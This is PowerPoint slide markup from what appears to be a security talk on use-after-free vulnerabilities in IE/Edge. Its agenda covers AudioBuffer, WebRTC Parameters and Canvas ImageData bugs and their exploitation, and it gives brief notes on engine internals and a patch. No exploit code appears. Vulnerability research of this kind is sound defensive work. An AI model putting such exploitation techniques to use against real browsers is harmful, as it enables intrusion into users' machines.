              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>UnpackArrayObjectVar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> will get the length of the object array. If the length is an object, it will be converted to an integer.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="矩形 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4A119E7-409A-4BDD-93FE-3F25ED22C366}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6867938" y="5087108"/>
            <a:ext cx="5163644" cy="2308324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>For dynamic objects in each object array, the function CJScript9Holder::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>VarAddRef</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> will add a reference to the object, and then </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ModernArray</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> will cache the dynamic object.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="矩形 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{342D4BE1-AE68-42FE-BE78-DAC781E5DCD0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1165733" y="4157853"/>
            <a:ext cx="3215768" cy="17792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5F9AB5A5-AD1E-4789-A8F1-0B4038176FB7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1460501" y="5234668"/>
            <a:ext cx="3317239" cy="16521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5" name="连接符: 肘形 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E2C6D04-0B6A-484D-9A48-02B2F31FF3E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="17" idx="3"/>
            <a:endCxn id="15" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4381501" y="2983245"/>
            <a:ext cx="5069908" cy="1263572"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector4">
            <a:avLst>
              <a:gd name="adj1" fmla="val 24554"/>
              <a:gd name="adj2" fmla="val 11809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矩形 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{164AC9EF-8ECE-455A-9954-B798A90B9B69}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1818641" y="7039049"/>
            <a:ext cx="2463799" cy="16521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12" name="连接符: 肘形 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F1C8E41-0515-4F34-B616-2EABA3D988DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:endCxn id="13" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4282440" y="5630714"/>
            <a:ext cx="2588796" cy="1486366"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 66444"/>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矩形 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73AE72F8-C476-4638-AADE-BCB84ADD1534}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1070503" y="10040501"/>
            <a:ext cx="3211937" cy="22347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26" name="连接符: 肘形 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9849D7E3-2017-4C5B-A972-8AA39B5B89CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="30" idx="3"/>
            <a:endCxn id="25" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="3050541" y="7204262"/>
            <a:ext cx="1231899" cy="2947976"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector4">
            <a:avLst>
              <a:gd name="adj1" fmla="val -18557"/>
              <a:gd name="adj2" fmla="val 51895"/>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8482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文本框 20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5550258" y="2591636"/>
            <a:ext cx="2023361" cy="514948"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" anchor="ctr">
            <a:normAutofit fontScale="32500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="11575" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="SimHei" charset="-122"/>
                <a:ea typeface="SimHei" charset="-122"/>
                <a:cs typeface="SimHei" charset="-122"/>
              </a:rPr>
              <a:t>CONTENTS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="7734" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="SimHei" charset="-122"/>
              <a:ea typeface="SimHei" charset="-122"/>
              <a:cs typeface="SimHei" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="文本框 21"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5550258" y="1781608"/>
            <a:ext cx="2023360" cy="1324976"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="dist"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="5000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="FZChaoCuHei-M10" charset="-122"/>
                <a:ea typeface="FZChaoCuHei-M10" charset="-122"/>
                <a:cs typeface="FZChaoCuHei-M10" charset="-122"/>
              </a:rPr>
              <a:t>目录</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="2" name="组合 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12812DEF-A467-46F6-87AD-F47F92656D32}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1581386" y="3286213"/>
            <a:ext cx="9528149" cy="6583702"/>
            <a:chOff x="4281236" y="3089996"/>
            <a:chExt cx="15711176" cy="10856013"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="18" name="平行四边形 17">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E37EF20E-F1ED-4AD7-9875-8F4A1FBF37EB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6122994" y="3089996"/>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01</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="19" name="平行四边形 18">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7DEE57E8-F9F0-4D6D-A813-836BD0885DA6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7592296" y="3090001"/>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400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-ea"/>
                </a:rPr>
                <a:t>Historical Review of UAF Exploits Under IE/Edge</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22" name="平行四边形 21">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AA3697AF-C6DF-4282-8997-9878D3076071}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="18362690" y="4498601"/>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23" name="平行四边形 22">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4AE109B-5E87-4ACC-B482-F96240A21CBC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7874088" y="4480435"/>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400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-ea"/>
                </a:rPr>
                <a:t>Edge </a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-ea"/>
                </a:rPr>
                <a:t>AudioBuffer</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-ea"/>
                </a:rPr>
                <a:t> UAF Vulnerability Analysis and Exploitation</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="24" name="平行四边形 23">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4DC7E743-A4B9-448D-AC89-755C99437576}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5275357" y="5870862"/>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25" name="平行四边形 24">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0EDDBF0D-89A6-46C6-B773-A16A8543CE3B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6905078" y="5870867"/>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400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-ea"/>
                </a:rPr>
                <a:t>WebRTC Parameters UAF</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-ea"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-ea"/>
                </a:rPr>
                <a:t>Vulnerability Analysis</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26" name="平行四边形 25">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F51D2C1-5583-4980-9AB2-7057B7D93B4E}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="17948458" y="7279467"/>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27" name="平行四边形 26">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF7F63A0-3E1F-4909-B12D-67BDB3C801DA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="7427769" y="7279472"/>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pPr lvl="0" defTabSz="914400">
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-ea"/>
                </a:rPr>
                <a:t>Canvas </a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-ea"/>
                </a:rPr>
                <a:t>ImageData</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-ea"/>
                </a:rPr>
                <a:t> UAF</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-ea"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-ea"/>
                </a:rPr>
                <a:t>Vulnerability Analysis and Exploitation</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="28" name="平行四边形 27">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{823D98FD-DCCF-4BFC-A510-790716093FF3}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4697606" y="8688070"/>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29" name="平行四边形 28">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5739D1B3-493B-4F07-B982-072DFDAF3E10}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6166906" y="8688075"/>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400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-ea"/>
                </a:rPr>
                <a:t>WebRTC Parameters UAF</a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-ea"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-ea"/>
                </a:rPr>
                <a:t>Vulnerability  Exploitation</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="30" name="平行四边形 29">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40A62914-6BF2-4BAC-AFA0-6797B3400854}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="17393680" y="10081037"/>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06</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="31" name="平行四边形 30">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8804EAB5-7B73-4EC0-878E-A8B8E34E85AF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6905078" y="10062871"/>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rmAutofit fontScale="70000" lnSpcReduction="20000"/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPct val="120000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-ea"/>
                </a:rPr>
                <a:t>Summary</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="32" name="平行四边形 31">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E71C5E14-9A8D-4F27-BC9E-66CF77722CD1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="4281236" y="11362794"/>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07</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="33" name="平行四边形 32">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C00EE62-77CC-439B-AA31-F091E6661ABB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="5750536" y="11362799"/>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rmAutofit fontScale="70000" lnSpcReduction="20000"/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPct val="120000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-ea"/>
                </a:rPr>
                <a:t>Q&amp;A and Acknowledgements</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="34" name="平行四边形 33">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71463813-8802-4F51-8CDC-492BEA068999}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="16874061" y="12773932"/>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08</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="35" name="平行四边形 34">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E18B18D2-2FC7-49D3-984C-086F292C52AC}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6385461" y="12755765"/>
              <a:ext cx="10629695" cy="117207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rmAutofit fontScale="70000" lnSpcReduction="20000"/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr">
                <a:lnSpc>
                  <a:spcPct val="120000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3600" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-ea"/>
                </a:rPr>
                <a:t>References</a:t>
              </a:r>
              <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1244039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1" name="文本框 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1BA8845-3DC4-4801-BF10-693DEB5382C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078125" y="2550693"/>
            <a:ext cx="10953455" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>After the patch, the function ORTC::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ClearModernArrayVarsIfNecessary</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="19" name="图片 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B160BF34-8350-498D-8402-1AFA5A8F8BC5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078125" y="3075963"/>
            <a:ext cx="8256944" cy="3454247"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="矩形 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{037047C4-95CE-4C15-AEEC-4DA78DDFE8CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
